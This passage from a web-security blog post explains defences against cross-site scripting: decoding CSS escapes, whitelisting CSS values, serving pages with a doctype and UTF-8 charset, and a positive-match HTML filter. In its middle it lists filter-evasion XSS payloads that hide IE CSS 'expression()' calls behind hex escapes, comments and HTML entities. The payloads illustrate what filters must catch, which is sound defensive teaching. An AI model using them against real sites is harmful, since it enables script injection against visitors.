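        if (code === 0 || (code >= 0xD800 && code <= 0xDFFF) || code > 0x10FFFF) {
          return '\uFFFD';
        }
        return String.fromCodePoint(code);
      }
      return literal;  // e.g. "\(" is just "("
    });
}

decodeCssEscapes('\\61 \\62 \\63');                       // 'abc'
decodeCssEscapes('xss:\\000065 xpression(open(alert(1)))'); // 'xss:expression(...)'
```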

This leaves you with a nightmare scenario when it comes to protecting CSS property values: IE7 and IE7 compat mode (on newer builds of IE) support expressions in CSS, which basically allow you to execute JavaScript code inside CSS values. A simplistic example:


<div style="xss:expression(open(alert(1)))"></div>

I use the open() function call to avoid the annoying client-side DoS of continual alert popups. Anything inside the “(” and “)” of the expression is a one-line JavaScript call. In the example I use an invalid property called “xss”, but it’s more likely to be “color” or “font-family”. Let’s take it up a notch, start to encode the CSS value and see what executes. I’ll just encode the “e” of expression to make it easier to follow.


Hex escape:
<div style="xss:\65xpression(open(alert(1)))"></div>
Hex escape with trailing space:
<div style="xss:\65 xpression(open(alert(1)))"></div>
Hex escape with trailing space and zero padded:
<div style="xss:\000065 xpression(open(alert(1)))"></div>
Hex escape with trailing space and zero padded and comment:
<div style="xss:\000065 /*comment*/xpression(open(alert(1)))"></div>
Hex escape with trailing space and zero padded and HTML encoded comment:
<div style="xss:\000065 &#x2f;&#x2a;comment*/xpression(open(alert(1)))"></div>
and finally hex escape with encoded backslash with trailing space and zero padded and HTML encoded comment:
<div style="xss:&#x5c;000065 &#x2f;&#x2a;comment*/xpression(open(alert(1)))"></div>

I’m sure you’ll agree that’s hard to follow, and there are literally millions of combinations. Unfortunately you can’t simply hex escape the value and expect it to be safe from injection since, as you’ve seen, even encoded CSS escapes can be used as vectors. The option you’re left with from a defensive point of view is to whitelist every CSS property value. Luckily I’ve already done that with CSSReg, and Norman Hippert kindly converted it to PHP.
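CSSReg is the complete answer; purely to illustrate the whitelisting idea, here is a tiny sketch that accepts only a few properties, each with a strict value pattern. Because backslashes, “&”, “/” and parentheses can never match, none of the escape tricks above get a chance to be interpreted. The property list and patterns are hypothetical examples, not CSSReg’s rules.

```javascript
// Hypothetical whitelist: property name -> pattern the whole value must match.
const allowedCss = {
  'color': /^(?:#[0-9a-f]{3}|#[0-9a-f]{6}|black|white|red|green|blue)$/i,
  'font-weight': /^(?:normal|bold|[1-9]00)$/,
  'text-align': /^(?:left|right|center|justify)$/
};

// Returns a safe "prop:value;" declaration, or '' if anything isn't whitelisted.
function filterDeclaration(property, value) {
  const prop = String(property).trim().toLowerCase();
  const val = String(value).trim();
  if (!Object.prototype.hasOwnProperty.call(allowedCss, prop)) return '';
  return allowedCss[prop].test(val) ? prop + ':' + val + ';' : '';
}

filterDeclaration('color', '#fff');                          // 'color:#fff;'
filterDeclaration('color', '\\65xpression(open(alert(1)))'); // ''
```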

Serving your pages

Every single page on your site that’s available on the web should include a doctype and a UTF-8 charset in a meta tag. Now that we have the shortened HTML5 header, we can use the following:


<!doctype html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
... your content ....

This is to prevent charset attacks and E4X vectors, and to force your document into standards mode in IE, which is also important. I also recommend you enforce standards mode by following this blog post from Dave Ross.

Positive matching and filtering HTML

The last section of this long blog post covers how to write your own filter. I don’t think I’m the world’s greatest programmer, but I think I’ve worked out a cool technique for filtering content using little code: by only matching the content you want, you won’t get anything bad. I hope you take the basis of this code, improve it and learn from it. This code is intentionally incomplete; I wrote a more complete HTML filter called HTMLReg, which you can examine if you want to improve this basic filter. But I recommend you try to improve the filter yourself, and learn to break it too.
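The core of positive matching fits in a few lines: at each position, either an exact whitelisted token matches and is copied verbatim, or the current character is emitted HTML-escaped, so nothing unrecognised ever reaches the output as markup. This simplified sketch (`positiveFilter` is a hypothetical name, using the same four tags as the filter below) does not check that tags are nested or balanced.

```javascript
function positiveFilter(input) {
  input = String(input);
  const allowedTag = /^<\/?(?:b|i|strong|s)>/;
  const escapes = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  let output = '';
  let pos = 0;
  while (pos < input.length) {
    const match = allowedTag.exec(input.slice(pos));
    if (match) {
      output += match[0];             // exact whitelisted tag: copy verbatim
      pos += match[0].length;
    } else {
      const chr = input[pos];
      output += escapes[chr] || chr;  // anything else is treated as text
      pos += 1;
    }
  }
  return output;
}

positiveFilter('<b>hi</b><script>x</script>');
// '<b>hi</b>&lt;script&gt;x&lt;/script&gt;'
```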

<script>
function yourFilter(input) {
	var output = '' , pos = 0;
	input = input + ''; //ensure we have a string
	function isNewline(chr) {
		return /^[\f\n\r\u000b\u2028\u2029]$/.test(chr);
	}
	function outputSpace(chr) {
		if(!/^\s$/.test(output.slice(-1)) && !isNewline(chr)) { //skip new lines and multiple spaces
			output += chr;
		}
	}
	function outputChars(chrs) {
		output += chrs;
	}
	function error(m) {
		throw {
                  description: m
                };
	}
	function parseHTML() {
		var allowedTags = /^<\/?(?:b|i|strong|s)>/,
			match;
			if(allowedTags.test(input.substr(pos))) {
				match = allowedTags.exec(input.substr(pos));
				if(match === null) {
					error("Invalid tag");
				} else 

